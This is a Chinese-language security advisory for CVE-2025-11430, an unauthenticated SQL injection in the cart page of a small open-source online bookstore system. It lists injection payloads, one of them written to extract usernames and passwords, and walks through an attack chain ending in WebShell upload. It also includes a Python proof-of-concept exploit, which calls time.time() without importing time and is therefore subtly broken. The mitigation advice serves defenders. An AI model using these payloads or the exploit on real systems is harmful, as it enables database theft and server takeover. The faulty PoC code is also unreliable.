CVE-2025-11430：SourceCodester在线书店系统SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-11430

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

SourceCodester Simple E-Commerce Bookstore

漏洞概述

CVE-2025-11430是SourceCodester Simple E-Commerce Bookstore 1.0版本中存在的一个高危SQL注入漏洞。该漏洞位于系统的/cart.php文件中，具体涉及对参数remove的操作处理。由于应用程序未对用户输入进行充分的过滤和参数化处理，远程攻击者可以通过构造恶意的SQL语句注入到数据库查询中，从而实现未授权的数据访问、修改或删除操作。

该漏洞的CVSS 3.1评分为7.3，属于高危级别。攻击者无需任何身份认证即可远程发起攻击，也无需用户进行任何交互操作，这大大降低了攻击的门槛和复杂度。根据漏洞描述，该漏洞的利用代码已经公开披露，意味着任何具备基本攻击知识的攻击者都可以轻松复现和利用此漏洞。

SourceCodester Simple E-Commerce Bookstore是一个开源的电子商务书店管理系统，主要用于小型在线书店的搭建。由于其用户群体广泛且系统直接面向公网部署，一旦被攻击者利用，可能导致大量用户的个人信息、订单数据、支付信息等敏感数据泄露。此外，SQL注入漏洞还可能被进一步利用来执行系统命令，实现对服务器的控制，对业务系统造成严重的安全威胁。

技术细节

该漏洞的根本原因在于/cart.php文件中处理remove参数时，未采用预编译参数化查询或充分的输入验证机制，而是直接将用户输入拼接到SQL查询语句中执行。具体而言，当用户通过GET或POST请求向/cart.php提交remove参数时，服务器端代码会将该参数值直接嵌入到SQL DELETE或UPDATE语句中，而没有进行适当的转义或过滤。

攻击者可以利用经典的SQL注入技术，通过构造特殊的SQL语句片段（如单引号闭合、UNION联合查询、布尔盲注、时间盲注等）来绕过正常的查询逻辑。典型的攻击payload示例如下：

1. 基于UNION的注入：通过' UNION SELECT username,password FROM users-- 等语句获取数据库中的用户凭据。
2. 基于布尔的盲注：通过' AND 1=1-- 和' AND 1=2-- 等条件判断逐步提取数据库信息。
3. 基于时间的盲注：通过' AND SLEEP(5)-- 等延迟注入技术确认漏洞存在并提取数据。

由于该漏洞的CVSS向量为AV:N/AC:L/PR:N/UI:N，表示攻击复杂度低、无需权限和用户交互，攻击者可以完全自动化地批量扫描和利用存在漏洞的目标系统。攻击成功后，攻击者可以读取、修改或删除数据库中的任意数据，甚至可能通过SQL注入进一步执行系统命令，实现对Web服务器的完全控制。

攻击链分析

STEP 1

步骤1：目标侦察

攻击者使用搜索引擎（如Shodan、Censys）或自动化扫描工具（如Nmap、Nuclei）搜索部署了SourceCodester Simple E-Commerce Bookstore 1.0的Web服务器，识别暴露在公网上的目标系统。

STEP 2

步骤2：漏洞探测

攻击者向目标站点的/cart.php文件发送带有恶意SQL片段的remove参数，通过比较正常请求与注入请求的响应差异，或使用时间延迟技术确认SQL注入漏洞的存在。

STEP 3

步骤3：数据提取

利用确认的SQL注入漏洞，通过UNION联合查询或盲注技术逐步提取数据库中的敏感信息，包括管理员账号密码哈希、用户个人信息、订单数据等。

STEP 4

步骤4：权限提升与持久化

利用获取的管理员凭据登录后台管理系统，上传WebShell或修改系统配置，实现对Web服务器的持久化控制。

STEP 5

步骤5：数据破坏与横向移动

攻击者可能删除或篡改数据库中的业务数据，或者利用已控制的服务器作为跳板，对内网其他系统发起进一步攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-11430 PoC - SQL Injection in /cart.php via 'remove' parameter
# Target: SourceCodester Simple E-Commerce Bookstore 1.0
# Vulnerability: SQL Injection

import requests
import sys

TARGET_URL = "http://target.com/cart.php"

def check_sql_injection(target_url):
    """Check if the target is vulnerable to SQL injection via 'remove' parameter"""
    # Normal request
    normal_payload = {"remove": "1"}
    normal_response = requests.get(target_url, params=normal_payload)
    normal_length = len(normal_response.text)

    # Boolean-based SQL injection test payload
    true_payload = {"remove": "1' AND '1'='1"}
    false_payload = {"remove": "1' AND '1'='2"}

    true_response = requests.get(target_url, params=true_payload)
    false_response = requests.get(target_url, params=false_payload)

    if len(true_response.text) != len(false_response.text):
        print("[+] Target is vulnerable to SQL injection!")
        return True
    else:
        print("[-] Target does not appear to be vulnerable.")
        return False

def exploit_sql_injection(target_url):
    """Exploit SQL injection to extract database information"""
    # Extract database version using UNION-based injection
    payload = {
        "remove": "1' UNION SELECT 1,version(),database(),user(),5-- -"
    }
    response = requests.get(target_url, params=payload)
    print(f"[+] Database info from response:\n{response.text}")

    # Time-based blind SQL injection to confirm
    time_payload = {"remove": "1' AND SLEEP(5)-- -"}
    start_time = time.time()
    requests.get(target_url, params=time_payload)
    elapsed = time.time() - start_time

    if elapsed >= 5:
        print(f"[+] Time-based injection confirmed (delay: {elapsed:.2f}s)")

if __name__ == "__main__":
    if len(sys.argv) > 1:
        TARGET_URL = sys.argv[1]
    if check_sql_injection(TARGET_URL):
        exploit_sql_injection(TARGET_URL)

影响范围

SourceCodester Simple E-Commerce Bookstore 1.0

防御指南

临时缓解措施

在官方发布安全补丁之前，建议采取以下临时缓解措施：1）通过Web应用防火墙（WAF）规则阻断对/cart.php文件中remove参数的SQL注入攻击特征；2）修改应用代码，对remove参数进行严格的整数类型验证，确保只接受数字输入；3）临时禁用/cart.php中的remove功能，或限制仅管理员可访问该操作；4）部署入侵检测系统（IDS）监控异常的数据库查询行为；5）对数据库进行最小权限配置，限制应用程序账户的权限范围；6）加强数据库的访问日志审计，及时发现和响应可疑活动。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-11430
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-11430
3 Details https://www.cvedetails.com/cve/CVE-2025-11430/
4 VulDB https://vuldb.com/cve/CVE-2025-11430
5 Link https://github.com/DrNbnonono/CVE/issues/2
6 Link https://vuldb.com/?ctiid.327367
7 Link https://vuldb.com/?id.327367
8 Link https://vuldb.com/?submit.666275
9 Link https://www.sourcecodester.com/
10 Link https://github.com/DrNbnonono/CVE/issues/2